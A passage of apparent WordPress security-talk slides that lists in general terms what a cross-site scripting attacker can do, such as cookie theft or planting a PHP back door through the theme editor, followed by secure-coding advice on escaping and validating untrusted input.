you into revealing your username/password • Steal your cookies! This means they can just pretend to be you! • They can perform requests as a logged in user. Eg create themselves a new user • Make a request to the plugin/theme editor and write to a ﬁle that then creates a PHP back door.
late as possible. 3. Escape everything from untrusted sources (like databases and users), third-parties (like Twitter), etc. 4. Never assume anything. 5. Never trust user input. 6. Sanitation is okay, but validation/ rejection is better. 7. Never trust user input.